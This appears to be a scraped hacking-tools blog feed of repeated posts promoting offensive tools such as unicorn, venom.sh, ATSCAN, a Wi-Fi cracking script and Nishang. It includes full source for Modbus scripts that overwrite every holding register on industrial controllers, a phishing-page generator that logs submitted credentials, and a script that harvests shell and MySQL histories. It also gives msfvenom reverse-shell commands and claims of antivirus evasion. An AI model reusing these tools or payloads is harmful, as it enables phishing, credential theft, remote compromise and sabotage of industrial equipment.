Changelog v2.2:
* pep8 formatting
* python3 conversion
* added randomized variables (not fully completed yet but its better than before) – AV picking up on variables and base64 encoded strings

unicorn v2.2

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustSec  | https://www.trustedsec.com/ | Our Post Before

linux-pentest-util is an Small Linux utils and penetration testing utils.

Requirements:
+ Nmap
+ Python 2.7.x

Collection of Utilities
Most notable util:
+ smalictrace.py — trace what methods can call/use a method, a field, or a class; read from smali files; usually Apktool is used instead of smali directly

smalictrace

Notable utils:
+ cexec — execute programs/scripts concurrently with limit and queue a.k.a. process pool
+ chdelim — change text delimiter
+ csvmerge — merge/group rows in CSV file based on equivalent columns
+ csvunmerge — reverse of csvmerge
+ httpserver.py — simple HTTP server; can be used to transfer files
+ nmap2csv — convert Nmap result to CSV
+ nmapfilter.sh — filter Nmap result
+ nmaptotal.sh — execute Nmap killer scan by using cexec
+ switchip.sh — handy tool to switch (static) IP address by name

Other utils:
+ brute.py — brute force generator
+ Brute.groovy — brute force generator
+ pkcs5.py — PKCS#5 (PKCS#7) pad/unpad
+ sqldecipher.sh — SQLCipher decipherer

brute force generator

Usage:

git clone https://github.com/fikr4n/linux-pentest-util && cd linux-pentest-util
(now you can run one by one what do you need)

Source: https://github.com/fikr4n

CHANGELOG VERSION 1.0.12 17/4/2016 codename: redteam_dev
FUNCTION
——————————————————————————————
improved -> no more need to write the extension (.exe .bat etc) in payload output name
added -> x64 arch payloads added to ‘availabe payloads list’
added -> payload.vbs [powershell base64 enc] exec.vbs template
added -> payload.exe [powershell base64 enc] c template compiled to stand-alone exec
added -> ‘system built-in shells’ -> simple powershell shell (tcp under powershell)
added -> ‘hta-to-javascript.html’ further encrypt hta payloads (thanks to 0xyg3n)
added -> ‘VBS-crypter.exe’ (thanks to suriya) further encrypt vbs payloads

venom.sh v1.0.12 codename redteam_dev

venom.sh v1.0.12dev

[ DISCLAMER ]
The author does not hold any responsibility for the bad use of this tool, remember that attacking targets without prior consent is illegal and punished by law.

Codename: Final Polymorphic Stub.
You can see what is a different

Komodo Venom v1.0.10

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) “the python funtion will execute the shellcode in ram” and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).
—
‘shellcode generator’ tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc..”P.S. some payloads are undetectable by AV soluctions yes!!!” one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

DEPENDENCIES :
— “crisp.sh will download/install all dependencies as they are needed”
— Zenity | Metasploit | GCC (compiler) | Pyinstaller (python-to-exe module)
— python-pip (pyinstaller downloader) | mingw32 (compile .EXE executables)
— pyherion.py (crypter) | PEScrambler.exe (PE obfuscator/scrambler.)

Features
option – build – target – format – output
—
1 – shellcode – unix – C – C
2 – shellcode – windows – C – DLL
3 – shellcode – windows – DLL – DLL
4 – shellcode – windows – C – PYTHON/EXE
5 – shellcode – windows – C – EXE
6 – shellcode – windows – MSIEXEC – MSI
7 – shellcode – windows – C – RUBY
8 – shellcode – windows – HTA-PSH – HTA
9 – shellcode – windows – PSH-CMD – PS1
10 – shellcode – windows – PSH-CMD – BAT
11 – shellcode – webserver – PHP – PHP
12 – shellcode – multi OS – PYTHON(b64) – PYTHON
—
F – FAQ (frequent ask questions)
E – exit shellcode generator

Usage:

git clone git://git.code.sf.net/p/crisp-shellcode-generator/shell crisp-shellcode-generator-shell
cd crisp-shellcode-generator-shell
./venom.sh

Updates:
cd cd crisp-shellcode-generator-shell
git pull origin master

If Broken you can download Mirror Manually at: http://sourceforge.net/code-snapshots/git/c/cr/crisp-shellcode-generator/shell.git/crisp-shellcode-generator-shell-a4bd07df390856096dc2788d46b9838c60bd1c28.zip


[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE? ]
The default way to generate a windows binarie payload (.exe) using msfvenom its achieved through -f flag (Output format)
msfvenom -p payload-name LHOST=127.0.0.1 LPORT=666 -f exe -o payload.exe

But msfvenom allow us to build shellcode in diferent formats
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c
java, perl, powershell, python, ruby, sh, vbscript.
The complete list can be accessed using the follow command: sudo msfvenom --help-formats

now lets generate a simple shellcode to windows/shell/reverse_tcp
chosing powershell as output format "note that we will not use
the flag -o (Save the payload) option, this way the shellcode
generated will only displays in current terminal windows".
Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell

Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java

Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex

our post before | Or Download Old Source: shell.tar.gz (24.9 MB)
Source :http://sourceforge.net/p/crisp-shellcode-generator/

MAS – Modbus Attack Scripts.
File List:
– read_all_holding_registers.py: Read all holding registers from a TCP MODBUS Slave.
– write_all_holding_registers.py: Write all holding registries on a TCP MODBUS Slave.

Requirements:
+ Python 2.7.x
+ Pymodbus is a full Modbus protocol implementation using twisted for its asynchronous communications core.

MAS – Modbus Attack Script

Usage:

pip2 install -U pymodbus
git clone https://github.com/romainallain/mas && cd mas
python read_all_holding_registers.py -h
python write_all_holding_registers.py -h

read_all_holding_registers.py Script:

#!/usr/bin/env python

"""
File: read_all_holding_registers.py
Desc: Read all holding registers from a TCP MODBUS Slave
Version: 0.0.2
"""

__author__ = 'rm'

from pymodbus.client.sync import ModbusTcpClient
import argparse
import sys
import collections


class ModbusException(Exception):
    _codes = {
        1:  'ILLEGAL FUNCTION',
        2:  'ILLEGAL DATA ADDRESS',
        3:  'ILLEGAL DATA VALUE',
        4:  'SLAVE DEVICE FAILURE',
        6:  'SLAVE DEVICE BUSY'
    }

    def __init__(self, code):
        self.code = code
        self.message = ModbusException._codes[code] if ModbusException._codes.has_key(code) else 'Unknown Modbus Exception'

    def __str__(self):
        return "Modbus Error. Exception %d: %s" % (self.code, self.message)


def status(msg):
    sys.stderr.write(msg[:-1][:39].ljust(39,' ')+msg[-1:])

def validate_ipv4(s):
    pieces = s.split('.')
    if len(pieces) != 4: return False
    try: return all(0<=int(p)<256 for p in pieces)
    except ValueError: return False

def scan():
    
    parser = argparse.ArgumentParser(description = "Read all holding registries from a TCP MODBUS Slave")
    parser.add_argument("ip", help="IP address of the slave")
    parser.add_argument("-p", "--port", dest="port", help="Modbus Port. Defaults to 502", type=int, metavar="PORT", default=502)
    parser.add_argument("-u", "--uid", dest="uid", help="Modbus Unit ID. Defaults to 1", type=int, metavar="UID", default=1)
    parser.add_argument("-sa", "--start-address", dest="start_address", help="Starting Address for the scanner. Defaults to 1", type=int, metavar="START", default=1)
    parser.add_argument("-ea", "--end-address", dest="end_address", help="Ending Address for the scanner. Defaults to 65535", type=int, metavar="END", default=65535)
    
    args = parser.parse_args()
    
    try:
        ip = args.ip
    except IndexError:
        print "ERROR: No target to scan\n\n"
        parser.print_help()
        exit()

    # ip address format verification
    if not validate_ipv4(ip):
        print "ERROR: IP address is invalid\n\n"
        parser.print_help()
        exit()

    print 'Connecting to %s...' % ip,
    # connect to modbus slave
    client = ModbusTcpClient(ip, args.port)
    client.connect()
    if client.socket == None:
        print "ERROR: Could not connect to %s." %ip
        exit()
    print ' Connected.'

    # TODO add ETA mechanism
    results = {}
    addr = 1
    for addr in range(args.start_address, args.end_address):
        hr = client.read_holding_registers(addr, 1, unit=args.uid) # unit value is device id of the slave (UID)
        if hr.function_code == 3: # if we succeed reading stuff
            results[addr] = hr.registers[0]
        # if it fails, hr.function = 131 (0x83), cf modbus doc

    client.close()
    print 'Register scanning is finished (%d registers were tried)' % (args.end_address-args.start_address+1)
    # sorting dict for printing
    ordered_results = collections.OrderedDict(sorted(results.items()))
    for addr, value in ordered_results.iteritems():
        print 'Addr {0} \t{1}'.format(addr,value)

if __name__=="__main__":
    try:
        scan()
    except KeyboardInterrupt:
        status("Ctrl-C happened\n")

write_all_holding_registers.py Script:

#!/usr/bin/env python

"""
File: write_all_holding_registers.py
Desc: Write all holding registers on a TCP MODBUS Slave
Version: 0.0.1
"""

__author__ = 'rm'

from pymodbus.client.sync import ModbusTcpClient
import argparse
import sys


class ModbusException(Exception):
    _codes = {
        1:  'ILLEGAL FUNCTION',
        2:  'ILLEGAL DATA ADDRESS',
        3:  'ILLEGAL DATA VALUE',
        4:  'SLAVE DEVICE FAILURE',
        6:  'SLAVE DEVICE BUSY'
    }

    def __init__(self, code):
        self.code = code
        self.message = ModbusException._codes[code] if ModbusException._codes.has_key(code) else 'Unknown Modbus Exception'

    def __str__(self):
        return "Modbus Error. Exception %d: %s" % (self.code, self.message)


def status(msg):
    sys.stderr.write(msg[:-1][:39].ljust(39,' ')+msg[-1:])

def validate_ipv4(s):
    pieces = s.split('.')
    if len(pieces) != 4: return False
    try: return all(0<=int(p)<256 for p in pieces)
    except ValueError: return False

def scan():
    
    parser = argparse.ArgumentParser(description = "Write all holding registries on a TCP MODBUS Slave")
    parser.add_argument("ip", help="IP address of the slave")
    parser.add_argument("-p", "--port", dest="port", help="Modbus Port. Defaults to 502", type=int, metavar="PORT", default=502)
    parser.add_argument("-u", "--uid", dest="uid", help="Modbus Unit ID. Defaults to 1", type=int, metavar="UID", default=1)
    parser.add_argument("-sa", "--start-address", dest="start_address", help="Starting Address for the writer. Defaults to 1", type=int, metavar="START", default=1)
    parser.add_argument("-ea", "--end-address", dest="end_address", help="Ending Address for the writer. Defaults to 65535", type=int, metavar="END", default=65535)
    parser.add_argument("-v", "--value", dest="value", help="Value that will be written. Defaults to 7777", type=int, metavar="VALUE", default=7777)
    
    args = parser.parse_args()
    
    try:
        ip = args.ip
    except IndexError:
        print "ERROR: No target given\n\n"
        parser.print_help()
        exit()

    # ip address format verification
    if not validate_ipv4(ip):
        print "ERROR: IP address is invalid\n\n"
        parser.print_help()
        exit()

    print 'Connecting to %s...' % ip,
    # connect to modbus slave
    client = ModbusTcpClient(ip, args.port)
    client.connect()
    if client.socket == None:
        print "ERROR: Could not connect to %s." %ip
        exit()
    print ' Connected.'

    # TODO add ETA mechanism
    results = []
    addr = 1
    for addr in range(args.start_address, args.end_address):
        hr = client.write_registers(addr, args.value, unit=args.uid) # unit value is device id of the slave (UID)
        if hr.function_code == 16: # if we succeeded writing stuff. code = 0x10
            results.append(addr)
        # if it fails, hr.function = 144 (0x90), cf modbus doc

    client.close()
    print 'Register writing is finished (%d addresses were tried)' % (args.end_address-args.start_address+1)
    print 'Writing was successful on these %d addresses:' % len(results)
    print results

if __name__=="__main__":
    try:
        scan()
    except KeyboardInterrupt:
        status("Ctrl-C happened\n")

Source: https://github.com/romainallain

Changelog 8.1:
+ Bugfix: Add ports scan info, Optimize code, Rebuild url scan process.
+ Logo Banner Change.

atscan v7.4

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v8.1.zip | v8.1.tar.gz

Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)
Menu Options:
0) Full Automatic Mode (Applies To All Encryption Types)
1) WEP Mode (Commands can be executed from a menu to easily circumvent any WEP connection)
2) WPS Mode (May also have WPA, WPA2, or WEP displayed. Ignore this, as it has no effect on success rate)
3) WPA Mode (Capture 4-way handshake, dictionary attack, bruteforce and others, VERY LOW SUCCESS RATE)
4) WPA2 Mode (Almost identical to WPA attacks. This mode also carries a VERY LOW SUCCESS RATE)

wifi hacking script v1.3

usage:

git clone https://github.com/esc0rtd3w/wifi-hacker && cd wifi-hacker
chmod +x wifi-hacker.sh
./wifi-hacker.sh

Source: https://github.com/esc0rtd3w

This is a simple python tool to create a mallicious website for password pishing. Please use this tool responsibly.
Requirements:
– Python 2.7.x
– urllib2

pyPISHER

Operating system Support: Debian, Mac OSX, Ubuntu Linux, FreeBSD, REDHAT, FEDORA, Arch Linux & Kali Linux 2.0

Usage:

git clone https://github.com/Renato-Silva/pyPISHER && cd pyPISHER
python pyPISHER.py

Script:

import os
import sys, traceback
import urllib2

#Clear console
def clear():
    os.system('cls' if os.name=='nt' else 'clear')
clear()

#Print name and description
print '''
\033[1;31m
     $$$$$   $$   $$        $$$$$   $$ $$$$$$ $$  $$ $$$$$$$ $$$$$
     $$   $$  $$ $$         $$   $$ $$ $$     $$  $$ $$      $$   $$
     $$   $$   $$           $$   $$ $$ $$     $$  $$ $$      $$   $$
     $$$$$     $$           $$$$$   $$ $$$$$$ $$$$$$ $$$$$   $$$$$
     $$        $$           $$      $$     $$ $$  $$ $$      $$  $$
     $$        $$           $$      $$     $$ $$  $$ $$      $$   $$
     $$        $$           $$      $$ $$$$$$ $$  $$ $$$$$$$ $$   $$
\033[1;m
\033[1;31m
Simple python app to gerenate a mallicious phishing website. 
\033[1;m
 \033[1;32m+ -- -- +=[ Author: RenatoSilva | Github: github.com/Renato-Silva\033[1;m
'''




#Ask user input for url
_url =raw_input('Website to copy (ex http://google.com): ')
#Ask user input for logs file name
_logsfilename =raw_input('Logs file name: ')+".txt"
#Ask user input for PHP file name
_phpfilename =raw_input('PHP file name: ')+".php"
#Ask user input for where to redirect
_redirect =raw_input('Redirect to: ')

#PHP script to add credentials to log
php='<?php\nheader (\'Location: '+_redirect+' \');\n$handle = fopen("'+_logsfilename+'", "a");\nforeach($_POST as $variable => $value) {\n\tfwrite($handle, $variable);\n\tfwrite($handle, "=");\n\tfwrite($handle, $value);\n\tfwrite($handle, "\\r\\n");}\nfwrite($handle, "===============\\r\\n");\nfclose($handle);\nexit;\n?>'

#Open PHP file, write script then close it
php_file = open(_phpfilename, 'w')
php_file.write(php)
php_file.close()

#Read webpage source code
response = urllib2.urlopen(_url)
page_source = response.read()
html_file = open("index.html", "w")
html_file.write(page_source)
final_source="";
with open('index.html') as f:
   for line in f:
       if line.find("forms")==-1:
		final_source=final_source+"\n"+line
       else:
		final_source=final_source+"\n"+'<form name="f1" method="post" action=login.php?"login.php" id="f1">'
html_file.close()
html_file = open("index.html", "w")
html_file.write(final_source)
html_file.close()

Source: https://github.com/Renato-Silva

Changelog v9.0:
+ NEW ARGS:
–regex
–sregex
–ifirst
–port
–pause
–ip

CHANGES:
+ new optim building
+ unique scans process
+ scan by regex
+ search by regex
+ optimized ports scan
+ added option to scan ips.
+ added option to choose where to install the tool
+ Now you can install in any system linux windows

Atscan scanner V 9.0

Description:
ATSCAN
SEARCH engine
XSS scanner.
Sqlmap.
LFI scanner.
Filter wordpress and Joomla sites in the server.
Find Admin page.
Decode / Encode MD5 + Base64.

atscan v6.1

Libreries to install:
ap-get install libxml-simple-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-ssleay-perl
NOTE: Works in linux platforms. Best Run on Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | if you use a windows you can download manualy.

Examples:
Simple search:
Search: –dork [dork] –level [level]
Search + get ip: –dork [dork] –level [level] –ip
Search + get ip + server: –dork [dork] –level [level] –ip –server
Search with many dorks: –dork [dork1,dork2,dork3] –level [level]
Search + get ip+server: –dork [dorks.txt] –level [level]
Search + set save file: –dork [dorks.txt] –level [level] –save myfile.txt
Search + Replace + Exploit: –dork [dorks.txt] –level [level] –replace [string] –with [string] –valid [string]

Subscan from Serach Engine:
Search + Exploitation: –dork [dork] –level [10] –xss/–lfi/–wp …
Search + Server Exploitation: -t [ip] –level [10] –xss/–lfi/–wp …
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –exp [exploit] –xss/–lfi/–wp …

Validation:
Search + Exploit + Validation: –dork [dork] –level [10] –exp –isup/–valid [string]
Search + Server Exploit + Validation: -t [ip] –level [10] –exp –isup/–valid [string]
Search + Replace + Exploit: –dork [dork] –level [10] –replace [string] –with [string] –isup/–valid [string]

Use List / Target:
-t [target/targets.txt] –exp –isup/–valid [string]
-t [target/targets.txt] –xss/–lfi ..

Server:
Get Server sites: -t [ip] –level [value] –sites
Get Server wordpress sites: -t [ip] –level [value] –wp
Get Server joomla sites: -t [ip] –level [value] –joom
Get Server upload sites: -t [ip] –level [value] –upload
Get Server zip sites files: -t [ip] –level [value] –zip
WP Arbitry File Download: -t [ip] –level [value] –wpadf
Joomla RFI: -t [ip] –level [1] –joomfri –shell [shell link]
Scan basic tcp (quick): -t [ip] –ports –basic tcp
Scan basic udp basic (quick): -t [ip] –ports –basic udp
Scan basic udp+tcp: -t [ip] –ports –basic udp+tcp
Scan complete tcp: -t [ip] –ports –all tcp
Scan complete udp: -t [ip] –ports –all udp
Scan complete udp+tcp: -t [ip] –ports –all udp+tcp
Scan rang tcp: -t [ip] –ports –select tcp –start [value] –end [value]
Scan rang udp: -t [ip] –ports –select udp–start [value] –end [value]
Scan rang udp + tcp: -t [ip] –ports –select udp+tcp –start [value] –end [value]

Encode / Decode:
Generate MD5: –md5 [string]
Encode base64: –encode64 [string]
Decode base64: –decode64 [string]

External Command:
–dork [dork/dorks.txt] –level [level] –command “curl -v –TARGET”
–dork [dork/dorks.txt] –level [level] –command “curl -v –FULL_TARGET”
-t [target/targets.txt] –level [level] –command “curl -v –TARGET”
-t [target/targets.txt] –command “curl -v –FULL_TARGET”

How to Usage:

git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
chmod +x install.sh
./install.sh
atscan

Update:
atscan --update

Source : https://github.com/AlisamTechnology | Our Post Before Download: v9.0.zip | v9.0.tar.gz

Tries it’s best to establish a connection to a ftp-server. If cannot connect, retries tirelessly for network to come back up. If can connect, but cannot establish a DATA-connection, starts brute forcing with parallel ftp-connections to find an open port.

perl module

You should use ftp in passive mode for brute-forcing to work best.

Usage:

git clone https://github.com/kivilahtio/Net-FTP-Brute && cd Net-FTP-Brute
cpan Modern::Perl
cpan Log::Log4perl
cpan Test::MockModule
perl Build.PL
./Build
./Build test
./Build install

Source: https://github.com/kivilahtio

Inspector is an Privilege Escalation unix helper (Forensics, Kernel exploit list, process).
with function:
+ History file; History Mysql, Shell
+ Forensics escalation
+ Process manager

Requirement:
+ Python .7.x
+ all linux platform support

usage:

wget https://raw.githubusercontent.com/graniet/Inspector/master/inspector.py
python inspector.py

Script:

#!/usr/env	python

import os,sys

# Global #######
file_history = []
no_can_open = 0
uname = ""
process_list = ""
kernel_version = ""
history_listing = ['.bash_history','.mysql_history','.bashrc','.zshrc','.zsh_history']
################

def prez():
	print """  _____                           _             
  \_   \_ __  ___ _ __   ___  ___| |_ ___  _ __ 
   / /\/ '_ \/ __| '_ \ / _ \/ __| __/ _ \| '__|
/\/ /_ | | | \__ \ |_) |  __/ (__| || (_) | |   
\____/ |_| |_|___/ .__/ \___|\___|\__\___/|_|   
                 |_|                            
{c} Github.com/Graniet"""

def getShell():
	if len(os.popen('find /Users -name ".bashrc" -type f -print 2>/dev/null').read().strip()) > 1:
		return "bash"
	elif len(os.popen('find /Users -name ".zshrc" -type f -print 2>/dev/null').read().strip()) > 1:
		return "zsh"
	else:
		return "sh?"


def checkShellHistory():
	shell = getShell()
	if len(os.popen('find /Users -name ".'+shell+'_history" -type f -print 2>/dev/null').read()) > 0:
		files = os.popen('find /Users -name ".'+shell+'_history" -type f -print 2>/dev/null').read()
		files = files.split('\n')
		for line in files:
			if line != '':
				for element in open(line, 'r'):
					if element != '':
						print "[#] "+element.strip()
			else:
				print "{!} Can't read ."+shell+"_history"
def checkMySQL():
	if len(os.popen('find /Users -name ".mysql_history" -type f -print 2>/dev/null').read()) > 0:
		files = os.popen('find /Users -name ".mysql_history" -type f -print 2>/dev/null').read()
		files = files.split('\n')
		for line in files:
			for element in open(line, 'r'):
				print "[#] "+element
	else:
		print "{!} Can't read .mysql_history"

def information():
	global uname
	global process_list
	global kernel_version
	kernel_version = os.popen('uname -r').read()
	uname = os.popen('uname -a').read()
	process_list = os.popen('ps axco user,command | grep root').read()
	print "========="
	print "= [!] User > "+os.popen('whoami').read().strip()
	print "= [!] Group > "+os.popen('id -Gn').read().strip()[:20]  
	print "= [!] Shell > "+getShell()
	print "= [!] "+uname.strip()
	print "= [+] Command : process,kernel_exploit,forensic" 
	print "========"

def process_listname():
	global process_list
	list_process = process_list.split('\n')
	for process in list_process:
		if 'mysql' in process:
			print "# " +process
			print "#### [!] MySQL run in root? "
		print "# " + process

def analyse():
	global file_history
	global no_can_open
	global array_analyse
	for line in file_history:
		if os.path.isfile(line):
			try:
				files = open(line, 'r')
				print "{+} " + line.strip()
				for line2 in files:
					if line2 != '':
						if 'mysql -u' in line2:
							print "# MySQL login found"
							print "	(!) MySQL commande line is used for login exemple : mysql -u root -p"
							print "	>>> " + line2.strip()
						if 'ssh' in line2:
							print "# SSH found"
							print "	(!) SSH used for secure connexion"
							print "	>>> "+ line2.strip()
													
			except:
				no_can_open = no_can_open + 1


def kernel_exploit():
	global kernel_version
	print "[!] kernel version: "+kernel_version

def history_help():
	print "=========="
	print "[+] MySQL history > history mysql"
	print "[+] Shell history > history shell"
	print "=========="

def main():
	x = 0
	while len(history_listing) > x:
		global file_history
		for fichier in history_listing:
			history = os.popen('find /Users -name "'+fichier+'" -type f -print 2>/dev/null').read()
			history = history.split("\n")
			#history = open('~/.bash_history', 'r')
			for line in history:
				if(line != ""):
					file_history.append(line)
			x = x+1
		information()
	#	analyse()
		try:
			while 1:
				prompt = raw_input('Inspector > ')
				if 'forensic' in prompt:
					analyse()
				if 'process' in prompt:
					process_listname()
				if 'kernel_exploit' in prompt:
					kernel_exploit()
				if 'history mysql' in prompt:
					checkMySQL()
				if 'history shell' in prompt:
					checkShellHistory()
				if 'help' in prompt:
					information()
				if prompt == "history":
					history_help()

		except:
			print "bye ^^"
prez()
main()

Source: https://github.com/graniet

changelog v2.3.1:
+ unicorn.py; fix ident issue and take out long load times

Unicorn is a PowerShell injection tool utilizing Matthew Graebers attack and expanded to automatically downgrade the process if a 64 bit platform is detected. This is useful in order to ensure that we can deliver a payload with just one set of shellcode instructions. This will work on any version of Windows with PowerShell installed. Simply copy and paste the output and wait for the shells.

Requirements:
+ Metasploit Framework

Attack Options:
+ POWERSHELL ATTACK INSTRUCTIONS
+ MACRO ATTACK INSTRUCTIONS
+ HTA ATTACK INSTRUCTIONS
+ CERUTIL Attack Instruction
+ Custom PS1 Attack Instructions

Usage:

git clone https://github.com/trustedsec/unicorn && cd unicorn
./unicorn --help
Update:
cd unicorn
git pull origin master

Example use:
python unicorn.py payload reverse_ipaddr port Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443

Download : Master.zip | Clone Url
Source: TrustSec  | https://www.trustedsec.com/ | Our Post Before

changelog v0.6.8:
+ Added Out-SCF in the Client directory.
The script generates a SCF file. The file (default name “SystemCatalog.scf”) needs to be put on a share. Whenever a user opens the file on the share, his credentials are sent to the specifed capture server. the IP address of the capture server is specifed in the icon field.

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.

Nishang v-0.6.2 released: PowerShell for penetration testing and offensive security.

Scripts; Nishang currently contains the following scripts and payloads.
+ Antak – the Webshell
– Antak :Execute PowerShell scripts in memory, run commands, and download and upload files using this webshell

+ Backdoors
– HTTP-Backdoor : A backdoor which can receive instructions from third party websites and execute PowerShell scripts in memory.
– DNS_TXT_Pwnage : A backdoor which can receive commands and PowerShell scripts from DNS TXT queries, execute them on a target, and be remotely controlled using the queries.
– Execute-OnTime : A backdoor which can execute PowerShell scripts at a given time on a target.
– Gupt-Backdoor : A backdoor which can receive commands and scripts from a WLAN SSID without connecting to it.
– Add-ScrnSaveBackdoor : A backdoor which can use Windows screen saver for remote command and script execution.
– Invoke-ADSBackdoor : A backdoor which can use alternate data streams and Windows Registry to achieve persistence.

+ Client
– Out-CHM : Create infected CHM files which can execute PowerShell commands and scripts.
– Out-Word : Create Word files and infect existing ones to run PowerShell commands and scripts.
– Out-Excel : Create Excel files and infect existing ones to run PowerShell commands and scripts.
– Out-HTA : Create a HTA file which can be deployed on a web server and used in phishing campaigns.
– Out-Java : Create signed JAR files which can be used with applets for script and command execution.
– Out-Shortcut : Create shortcut files capable of executing commands and scripts.
– Out-WebQuery : Create IQY files for phishing credentials and SMB hashes.

+ Escalation
– Enable-DuplicateToken : When SYSTEM privileges are required.
– Remove-Update : Introduce vulnerabilities by removing patches.

+ Execution
– Download-Execute-PS : Download and execute a PowerShell script in memory.
– Download_Execute : Download an executable in text format, convert it to an executable, and execute.
– Execute-Command-MSSQL : Run PowerShell commands, native commands, or SQL commands on a MSSQL Server with sufficient privileges.
– Execute-DNSTXT-Code : Execute shellcode in memory using DNS TXT queries.

+ Gather
– Check-VM : Check for a virtual machine.
– Copy-VSS : Copy the SAM file using Volume Shadow Copy Service.
– Invoke-CredentialsPhish : Trick a user into giving credentials in plain text.
– FireBuster FireListener: A pair of scripts for egress testing
– Get-Information : Get juicy information from a target.
– Get-LSASecret : Get LSA Secret from a target.
– Get-PassHashes : Get password hashes from a target.
– Get-WLAN-Keys: Get WLAN keys in plain text from a target.

+ Keylogger
Log keystrokes from a target.
– Invoke-MimikatzWdigestDowngrade: Dump user passwords in plain on Windows 8.1 and Server 2012
– Get-PassHints : Get password hints of Windows users from a target.

+ Pivot
– reate-MultipleSessions : Check credentials on multiple computers and create PSSessions.
– Run-EXEonRemote Copy and execute an executable on multiple machines.
– Invoke-NetworkRelay Create network relays between computers.

+ Prasadhak
– Prasadhak : Check running hashes of running process against the VirusTotal database.

+ Scan
– Brute-Force : Brute force FTP, Active Directory, MSSQL, and Sharepoint.
– Port-Scan : A handy port scanner

+ Powerpreter
Powerpreter : All the functionality of nishang in a single script module.

+ Shells :
– Invoke-PsGcat: Send commands and scripts to specifed Gmail account to be executed by Invoke-PsGcatAgent
– Invoke-PsGcatAgent: Execute commands and scripts sent by Invoke-PsGcat.
– Invoke-PowerShellTcp: An interactive PowerShell reverse connect or bind shell
